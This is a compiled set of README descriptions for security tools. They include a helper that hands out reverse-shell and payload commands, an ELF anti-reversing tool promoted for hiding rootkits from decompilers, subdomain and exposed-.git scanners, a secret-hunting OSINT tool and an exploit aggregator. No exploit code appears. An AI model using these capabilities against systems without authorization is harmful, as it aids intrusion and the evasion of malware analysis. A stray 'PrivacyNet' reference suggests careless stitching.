Usage: secbutler [flags] secbutler [command]
Available Commands: cheatsheet Read common cheatsheets & payloads help Help about any command listener Obtain the command to start a reverse shell listener payloads Obtain and serve common payloads proxy Obtain a random proxy from FreeProxy revshell Obtain the command for a reverse shell tools Generate a install script for the most common cybersecurity tools version Print the current version wordlists Generate a download script for the most common wordlists
Flags: -h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Installation
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
License
secbutler is made with π€ by the GroundSec team and released under the MIT LICENSE.
NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.
Install
git clone https://github.com/MatheuZSecurity/NullSection cd NullSection gcc nullsection.c -o nullsection ./nullsection
Advantage
When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."
Make good use of the tool!
Note
We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
How it works?
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
Why i create this?
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
options: -h, --help show this help message and exit -b BASE, --base BASE Base name to use -v, --verbose Show verbose output -t THREADS, --threads THREADS Number of threads for concurrent execution -p PERMUTATIONS, --permutations PERMUTATIONS File containing permutations
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
What is Swagger?
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
About SwaggerHub
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Why OSINT on SwaggerHub?
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
How SwaggerSpy Works
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
Getting Started
To use SwaggerSpy, follow these steps:
Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/SwaggerSpy.git cd SwaggerSpy pip install -r requirements.txt
Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python swaggerspy.py searchterm
Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.
Disclaimer
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contribution
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
About the Author
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
TODO
Regular Expressions Enhancement
[ ] Review and improve existing regular expressions.
[ ] Ensure that regular expressions adhere to best practices.
[ ] Check for any potential optimizations in the regex patterns.
[ ] Test regular expressions with various input scenarios for accuracy.
[ ] Document any complex or non-trivial regex patterns for better understanding.
[ ] Explore opportunities to modularize or break down complex patterns.
[ ] Verify the regular expressions against the latest specifications or requirements.
[ ] Update documentation to reflect any changes made to the regular expressions.
License
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
Thanks
Special thanks to @Liodeus for providing project inspiration through swaggerHole.
SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.
Features
Measure download speed, upload speed, and ping latency.
Generate detailed reports with graphical representation of speed test results.
Save and export test results in various formats (CSV, JSON, etc.).
Customize speed test parameters and server selection.
Compare speed test results over time to track performance changes.
Integrate SpeedyTest into your own applications using the provided API.
Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:
pip install -r requirements.txt
Usage
Run the following command to perform a speed test:
python3 speendytest.py
Visual Output
Output
Receiving data \ Speed test completed! Speed test time: 20.22 second Server : Farknet - Konya IP Address: speedtest.farknet.com.tr:8080 Country : Turkey City : Konya Ping : 20.41 ms Download : 90.12 Mbps Loading : 20 Mbps
Contributing
Contributions are welcome! To contribute to SpeedyTest, follow these steps:
Fork the repository.
Create a new branch for your feature or bug fix.
Make your changes and commit them.
Push your changes to your forked repository.
Open a pull request in the main repository.
Contact
If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Features
CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
User-Friendly Interface: Easy to use, providing clear and concise information.
Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.
Usage
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
Patching Prioritization System
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
Changelog
[17th February 2024] - Enhancement Update
Additional Information: Added further information such as references & vector string
Removed: Star count in publicly available exploits
[15th January 2024] - Enhancement Update
Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
JSON and CSV Export: Added functionality to export results to JSON and CSV files.
Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.
[13th January 2024] - Initial Release
Initial release of SploitScan.
Contributing
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
RepoReaper is a precision tool designed to automate the identification of exposed .gitrepositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
Features
Automated scanning of domains and subdomains for exposed .git repositories.
Streamlines the detection of sensitive data exposures.
User-friendly command-line interface.
Ideal for security audits and Bug Bounty.
Installation
Clone the repository and install the required dependencies:
RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β
Disclaimer
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.